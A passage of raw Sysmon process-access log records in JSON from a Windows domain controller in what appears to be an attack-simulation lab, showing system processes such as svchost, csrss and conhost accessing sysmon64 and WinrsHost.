06:49:51.956","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2625,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2626,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2627,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2628,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2629,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2630,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-108F-5F25-0000-001040B60400}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-108F-5F25-0000-001040B60400}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2631,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.972\r\nSourceProcessGUID: {E2A3D6B1-108F-5F25-0000-001040B60400}\r\nSourceProcessId: 4612\r\nSourceThreadId: 4632\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-108F-5F25-0000-0010BFB50400}\r\nTargetProcessId: 4600\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.972","SourceProcessGUID":"{E2A3D6B1-108F-5F25-0000-001040B60400}","SourceProcessId":"4612","SourceThreadId":"4632","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-108F-5F25-0000-0010BFB50400}","TargetProcessId":"4600","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2632,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-108F-5F25-0000-0010BFB50400}\r\nTargetProcessId: 4600\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-108F-5F25-0000-0010BFB50400}","TargetProcessId":"4600","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2633,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.988\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nSourceProcessId: 1336\r\nSourceThreadId: 1660\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-108F-5F25-0000-0010BFB50400}\r\nTargetProcessId: 4600\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: 